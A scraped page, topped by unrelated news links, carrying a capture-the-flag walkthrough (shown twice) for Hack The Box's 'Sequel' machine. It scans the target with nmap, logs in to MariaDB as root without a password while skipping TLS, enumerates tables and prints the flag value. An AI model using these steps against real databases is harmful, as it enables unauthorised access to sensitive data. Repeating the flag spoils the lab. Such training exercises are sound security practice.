![[The AI Show Episode 144]: ChatGPT’s New Memory, Shopify CEO’s Leaked “AI First” Memo, Google Cloud Next Releases, o3 and o4-mini Coming Soon & Llama 4’s Rocky Launch](https://www.marketingaiinstitute.com/hubfs/ep%20144%20cover.png)
![[DEALS] The All-in-One Microsoft Office Pro 2019 for Windows: Lifetime License + Windows 11 Pro Bundle (89% off) & Other Deals Up To 98% Off](https://www.javacodegeeks.com/wp-content/uploads/2012/12/jcg-logo.jpg){kind=logo}
_Andreas_Prott_Alamy.jpg?width=1280&auto=webp&quality=80&disable=upscale#)
![What features do you get with Gemini Advanced? [April 2025]](https://i0.wp.com/9to5google.com/wp-content/uploads/sites/4/2024/02/gemini-advanced-cover.jpg?resize=1200%2C628&quality=82&strip=all&ssl=1)
![Apple Shares Official Trailer for 'Long Way Home' Starring Ewan McGregor and Charley Boorman [Video]](https://www.iclarified.com/images/news/97069/97069/97069-640.jpg)
![Apple Watch Series 10 Back On Sale for $299! [Lowest Price Ever]](https://www.iclarified.com/images/news/96657/96657/96657-640.jpg)
![EU Postpones Apple App Store Fines Amid Tariff Negotiations [Report]](https://www.iclarified.com/images/news/97068/97068/97068-640.jpg)
Navigating MariaDB on HTB’s ‘Sequel’ Box to Retrieve the Flag
Introduction In this guide, we’ll connect directly to the MariaDB instance on Hack The Box’s Sequel machine, enumerate its databases, tables, and extract the flag. You’ll learn to: Discover database services with nmap Authenticate to MariaDB, including dealing with TLS issues List databases and tables with SQL commands Query tables to retrieve sensitive data (the flag) Prerequisites Kali Linux (or any distro with mysql-client) Active HTB VPN connection 1. Scan for MySQL/MariaDB Service Identify open database port: nmap -sC -sV 10.129.28.113 -oN nmap-3306.txt Output snippet 3306/tcp open mysql? MariaDB 10.3.27 2. Connect to the Database Bypass TLS requirement in the MariaDB client: mysql --ssl -h 10.129.28.113 -u root --skip-ssl 3. Enumerate Databases & Tables List available databases: SHOW DATABASES; Select the target database: USE htb; List tables: SHOW TABLES; 4. Retrieve the Flag Inspect the config table for the flag: SELECT * FROM config; The value column for name = 'flag' contains: 7b4bec00d1a39e3dd4e021ec3d915da8 5. Automation Script Automate enumeration with scripts/enum-mysql.sh: bash scripts/enum-mysql.sh 10.129.28.113 6. Lessons Learned Direct database access can bypass web app filters. MariaDB often enforces TLS by default—be prepared to adjust client flags. Standard SQL commands (SHOW DATABASES, SHOW TABLES) quickly reveal sensitive tables.
Introduction
In this guide, we’ll connect directly to the MariaDB instance on Hack The Box’s Sequel machine, enumerate its databases, tables, and extract the flag.
You’ll learn to:
- Discover database services with
nmap - Authenticate to MariaDB, including dealing with TLS issues
- List databases and tables with SQL commands
- Query tables to retrieve sensitive data (the flag)
Prerequisites
- Kali Linux (or any distro with
mysql-client) - Active HTB VPN connection
1. Scan for MySQL/MariaDB Service
Identify open database port:
nmap -sC -sV 10.129.28.113 -oN nmap-3306.txt
Output snippet
3306/tcp open mysql? MariaDB 10.3.27
2. Connect to the Database
Bypass TLS requirement in the MariaDB client:
mysql --ssl -h 10.129.28.113 -u root --skip-ssl
3. Enumerate Databases & Tables
List available databases:
SHOW DATABASES;
Select the target database:
USE htb;
List tables:
SHOW TABLES;
4. Retrieve the Flag
Inspect the config table for the flag:
SELECT * FROM config;
The value column for name = 'flag' contains:
7b4bec00d1a39e3dd4e021ec3d915da8
5. Automation Script
Automate enumeration with scripts/enum-mysql.sh:
bash scripts/enum-mysql.sh 10.129.28.113
6. Lessons Learned
- Direct database access can bypass web app filters.
- MariaDB often enforces TLS by default—be prepared to adjust client flags.
- Standard SQL commands (
SHOW DATABASES,SHOW TABLES) quickly reveal sensitive tables.
